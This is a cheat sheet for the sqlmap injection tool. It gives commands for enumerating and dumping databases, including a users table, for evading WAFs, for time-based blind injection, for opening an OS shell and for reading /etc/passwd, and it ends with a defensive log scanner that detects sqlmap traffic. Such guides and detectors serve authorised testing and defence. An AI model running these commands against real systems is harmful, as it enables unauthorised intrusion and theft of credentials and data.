SQLMap: Comprehensive Guide

1. Basic Usage

Target a URL with a Vulnerable Parameter:

sqlmap -u "<target-url>?param=value"

Get Database List:

sqlmap -u "<target-url>" --dbs

2. Testing with POST Data

Send a POST Request:

sqlmap -u "<target-url>" --data="param1=value1&param2=value2"

Specify Risk and Level:

sqlmap -u "<target-url>" --data="param1=value1" --risk=3 --level=5

3. Identifying the Database Type

Check the Database Type (sqlmap reports the detected back-end DBMS whenever it confirms an injection; --technique=E restricts testing to error-based injection, and -f/--fingerprint gives a fuller DBMS version fingerprint):

sqlmap -u "<target-url>" --dbs --technique=E

4. Retrieving Database Tables

Specify the Database:

sqlmap -u "<target-url>" -D <database-name> --tables

5. Extracting Data from Tables

Dump All Data from a Table:

sqlmap -u "<target-url>" -D <database-name> -T <table-name> --dump

6. Extracting Specific Columns

Specify Columns to Dump (--columns only lists a table's columns; -C selects which columns to dump):

sqlmap -u "<target-url>" -D <database-name> -T <table-name> --columns

sqlmap -u "<target-url>" -D <database-name> -T <table-name> -C "<column1>,<column2>" --dump

7. Bypassing WAFs and Security Mechanisms

Use a Custom User-Agent (--random-agent picks a random browser User-Agent instead of a fixed one):

sqlmap -u "<target-url>" --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"

Use Proxy for Requests:

sqlmap -u "<target-url>" --proxy="http://127.0.0.1:8080"

8. Using SQLMap with Cookies

Pass Cookies for Authenticated Requests:

sqlmap -u "<target-url>" --cookie="PHPSESSID=<session-id>"

9. Handling Time-Based SQL Injection

Use Time-Based Techniques:

sqlmap -u "<target-url>" --time-sec=5 --technique=T

10. Injecting Shell Commands

Execute OS Commands:

sqlmap -u "<target-url>" --os-shell

11. Dumping Files from the Server

Dump a File:

sqlmap -u "<target-url>" --file-read="/etc/passwd"

12. Saving Output to a File

Save Results:

sqlmap -u "<target-url>" --dbs --output-dir=./output

13. Verbose Mode

Enable Verbose Output for Debugging (verbosity levels 0-6):

sqlmap -u "<target-url>" -v 3

14. Documentation and Community

Refer to the SQLMap documentation for detailed usage, options, and examples. Engage in forums or communities for tips and updated techniques.

Example Scenarios

1. Basic Database Enumeration:

sqlmap -u "http://example.com/page.php?id=1" --dbs

This command retrieves a list of databases available on the target server.

2. Extracting Tables from a Specific Database:

sqlmap -u "http://example.com/page.php?id=1" -D testdb --tables

This command lists all tables in the specified database testdb.

3. Dumping Data from a Specific Table:

sqlmap -u "http://example.com/page.php?id=1" -D testdb -T users --dump

This command extracts all data from the users table in the testdb database.

4. Using POST Data for Injection:

sqlmap -u "http://example.com/login.php" --data="username=admin&password=12345"

This command tests the login endpoint for SQL injection vulnerabilities using POST parameters.

5. Extracting Specific Columns from a Table:

sqlmap -u "http://example.com/page.php?id=1" -D testdb -T users -C "username,email" --dump

This command retrieves only the username and email columns from the users table (-C selects the columns; --columns by itself would only list them).

6. Using Cookies for Authentication:

sqlmap -u "http://example.com/dashboard.php" --cookie="PHPSESSID=abcd1234"

This command uses a session cookie to authenticate and test for SQL injection.

7. Bypassing a Web Application Firewall (WAF):

sqlmap -u "http://example.com/page.php?id=1" --user-agent="Mozilla/5.0"

This command sends requests with a custom User-Agent header instead of sqlmap's default "sqlmap/..." string, which signature-based filters commonly flag.

8. Reading a File from the Server:

sqlmap -u "http://example.com/page.php?id=1" --file-read="/etc/passwd"

This command attempts to read the /etc/passwd file from the target server.

9. Time-Based Blind SQL Injection:

sqlmap -u "http://example.com/page.php?id=1" --time-sec=5 --technique=T

This command tests for time-based blind SQL injection, using a 5-second delay in the injected condition to confirm that the injection works.

10. Using Proxies:

sqlmap -u "http://example.com/page.php?id=1" --proxy="http://127.0.0.1:8080"

This command routes SQLMap traffic through a specified proxy server.
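The defensive counterpart to sections 7 and 9, as an added example that is not part of the original cheat sheet: a small access-log scan that flags the three traces a sqlmap run leaves behind (the tool's default User-Agent, one parameter hammered with many distinct values, and the cluster of slow responses produced by --time-sec). The log format (combined format plus a trailing response time in milliseconds), the thresholds and the sample lines are assumptions constructed for this example.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qsl, urlsplit

# Assumed log shape (not from the cheat sheet): combined format plus a trailing
# response time in milliseconds, e.g. nginx logging $request_time at the end.
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<target>\S+) [^"]*" '
    r'\d{3} \S+ "[^"]*" "(?P<ua>[^"]*)" (?P<ms>\d+)$'
)

def analyze(log_text, min_variants=10, slow_ms=5000, min_slow=3):
    """Return {client_ip: sorted reasons} for clients whose traffic looks like a sqlmap run."""
    variants = defaultdict(set)  # (ip, path, param) -> distinct values sent for that param
    slow = defaultdict(int)      # ip -> responses that took at least slow_ms
    reasons = defaultdict(set)
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # lines in other formats are skipped rather than aborting the scan
        ip, ms = m["ip"], int(m["ms"])
        if m["ua"].startswith("sqlmap/"):  # stock User-Agent; section 7 shows how it gets replaced
            reasons[ip].add("default sqlmap User-Agent")
        url = urlsplit(m["target"])
        for name, value in parse_qsl(url.query, keep_blank_values=True):
            variants[(ip, url.path, name)].add(value)
        if ms >= slow_ms:  # a --time-sec delay shows up as a cluster of slow responses
            slow[ip] += 1
    for (ip, path, name), values in variants.items():
        if len(values) >= min_variants:  # one parameter probed with many different values
            reasons[ip].add(f"{len(values)} distinct values for {path}?{name}")
    for ip, n in slow.items():
        if n >= min_slow:
            reasons[ip].add(f"{n} responses taking at least {slow_ms} ms")
    return {ip: sorted(r) for ip, r in reasons.items()}

# Constructed sample traffic: a stock sqlmap scan, a spoofed-UA time-based scan, a normal visitor.
def _line(ip, target, ua, ms):
    return f'{ip} - - [01/Jan/2024:10:00:00 +0000] "GET {target} HTTP/1.1" 200 512 "-" "{ua}" {ms}'

SQLMAP_UA = "sqlmap/1.7 (https://sqlmap.org)"  # constructed; mirrors the shape of the real default
SAMPLE_LOG = "\n".join(
    [_line("203.0.113.7", f"/page.php?id=1%20v{i}", SQLMAP_UA, 40) for i in range(12)]
    + [_line("198.51.100.9", f"/page.php?id={i}", "Mozilla/5.0", 5200) for i in range(4)]
    + [_line("192.0.2.5", f"/page.php?id={i}", "Mozilla/5.0", 30) for i in range(2)]
)

if __name__ == "__main__":
    for ip, why in analyze(SAMPLE_LOG).items():
        print(ip, "->", "; ".join(why))
```

Tune min_variants and slow_ms to the application's own baseline; a spoofed User-Agent defeats only the first check, which is why the rate and latency signals matter.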